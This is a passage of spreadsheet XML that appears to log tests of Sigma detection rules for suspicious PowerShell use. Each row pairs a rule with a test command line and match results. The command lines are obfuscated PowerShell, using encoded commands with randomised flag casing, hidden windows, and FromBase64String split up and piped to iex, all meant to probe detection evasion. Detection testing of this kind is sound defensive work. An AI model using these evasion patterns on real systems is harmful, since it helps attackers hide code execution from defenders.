          <t>powershell.exe -eC JABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F1900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1900" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1900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900" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1900" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1901" ht="15.75" customHeight="1" s="42">
      <c r="A1901" s="43" t="n"/>
      <c r="B1901" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1901" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1901" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1901" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F1901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1901" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1901" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1901" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1901" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1902" ht="15.75" customHeight="1" s="42">
      <c r="A1902" s="43" t="n"/>
      <c r="B1902" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1902" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1902" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1902" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -encodEDcomMAnD "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F1902" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1902" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1902" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1902" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1902" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1902" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1903" ht="15.75" customHeight="1" s="42">
      <c r="A1903" s="43" t="n"/>
      <c r="B1903" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1903" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1903" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1903" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodeDCoMmaNd "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F1903" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1903" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1903" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1903" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1903" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1904" ht="15.75" customHeight="1" s="42">
      <c r="A1904" s="43" t="n"/>
      <c r="B1904" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1904" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1904" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1904" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F1904" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1904" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1904" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1904" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1904" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1905" ht="15.75" customHeight="1" s="42">
      <c r="A1905" s="43" t="n"/>
      <c r="B1905" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1905" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1905" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1905" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENCODEDcOMmand "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F1905" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1905" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1905" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1905" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1905" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1906" ht="15.75" customHeight="1" s="42">
      <c r="A1906" s="43" t="n"/>
      <c r="B1906" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1906" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1906" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1906" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enCodedCOmmaND "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F1906" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1906" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1906" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1906" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1906" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1907" ht="15.75" customHeight="1" s="42">
      <c r="A1907" s="43" t="n"/>
      <c r="B1907" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1907" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1907" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1907" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EnCOdEdcomMaND "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F1907" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1907" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1907" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1907" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1907" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1908" ht="15.75" customHeight="1" s="42">
      <c r="A1908" s="43" t="n"/>
      <c r="B1908" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1908" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1908" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1908" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1908" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1908" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1908" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1908" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1908" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1909" ht="15.75" customHeight="1" s="42">
      <c r="A1909" s="43" t="n"/>
      <c r="B1909" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1909" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1909" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1909" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1909" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1909" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1909" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1909" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1909" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1909" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1910" ht="15.75" customHeight="1" s="42">
      <c r="A1910" s="43" t="n"/>
      <c r="B1910" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1910" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1910" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1910" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnd "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1910" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1910" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1910" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1910" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1910" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1911" ht="15.75" customHeight="1" s="42">
      <c r="A1911" s="43" t="n"/>
      <c r="B1911" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1911" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1911" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1911" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1911" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1911" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1911" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1911" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1911" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1912" ht="15.75" customHeight="1" s="42">
      <c r="A1912" s="43" t="n"/>
      <c r="B1912" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1912" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1912" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1912" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1912" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1912" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1912" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1912" s="43" t="n"/>
      <c r="J1912" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1912" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1913" ht="15.75" customHeight="1" s="42">
      <c r="A1913" s="43" t="n"/>
      <c r="B1913" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1913" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1913" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1913" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1913" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1913" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1913" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1913" s="43" t="n"/>
      <c r="J1913" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1913" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1914" ht="15.75" customHeight="1" s="42">
      <c r="A1914" s="43" t="n"/>
      <c r="B1914" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1914" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1914" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1914" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1914" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1914" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1914" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1914" s="43" t="n"/>
      <c r="J1914" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1914" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1915" ht="15.75" customHeight="1" s="42">
      <c r="A1915" s="43" t="n"/>
      <c r="B1915" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1915" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1915" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1915" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1915" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1915" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1915" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1915" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1915" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1916" ht="15.75" customHeight="1" s="42">
      <c r="A1916" s="43" t="n"/>
      <c r="B1916" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1916" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1916" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1916" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaNd "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1916" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1916" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1916" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1916" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1916" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1917" ht="15.75" customHeight="1" s="42">
      <c r="A1917" s="43" t="n"/>
      <c r="B1917" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1917" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1917" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1917" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1917" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1917" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1917" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1917" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1917" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1918" ht="15.75" customHeight="1" s="42">
      <c r="A1918" s="43" t="n"/>
      <c r="B1918" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1918" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1918" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1918" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnD "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1918" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1918" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1918" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1918" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1918" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1919" ht="15.75" customHeight="1" s="42">
      <c r="A1919" s="43" t="n"/>
      <c r="B1919" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1919" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1919" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1919" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1919" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1919" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1919" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1919" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1919" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1920" ht="15.75" customHeight="1" s="42">
      <c r="A1920" s="43" t="n"/>
      <c r="B1920" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1920" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1920" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1920" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1920" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1920" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1920" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1920" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1920" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1921" ht="15.75" customHeight="1" s="42">
      <c r="A1921" s="43" t="n"/>
      <c r="B1921" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C1921" s="44" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D1921" s="44" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E1921" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -EncodedCommand QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F1921" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1921" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1921" s="43" t="inlineStr">
        <is>
          <t>Windows Shell/Scripting Processes Spawning Suspicious Programs (3a6586ad-127a-4d3b-a677-1e6eacdf8fde); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1921" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1921" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1922" ht="15.75" customHeight="1" s="42">
      <c r="A1922" s="43" t="n"/>
      <c r="B1922" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C1922" s="44" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D1922" s="44" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E1922" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wINdOWsTYLe Hidden -EnCODeDCOmmand QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F1922" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1922" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1922" s="43" t="inlineStr">
        <is>
          <t>Windows Shell/Scripting Processes Spawning Suspicious Programs (3a6586ad-127a-4d3b-a677-1e6eacdf8fde); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1922" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1922" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1923" ht="15.75" customHeight="1" s="42">
      <c r="A1923" s="43" t="n"/>
      <c r="B1923" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C1923" s="44" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D1923" s="44" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E1923" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wiNdOwSTYle Hidden -eNcodEdcOMManD QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F1923" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1923" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1923" s="43" t="inlineStr">
        <is>
          <t>Windows Shell/Scripting Processes Spawning Suspicious Programs (3a6586ad-127a-4d3b-a677-1e6eacdf8fde); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1923" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1923" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1924" ht="15.75" customHeight="1" s="42">
      <c r="A1924" s="43" t="n"/>
      <c r="B1924" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C1924" s="44" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D1924" s="44" t="inlineStr">
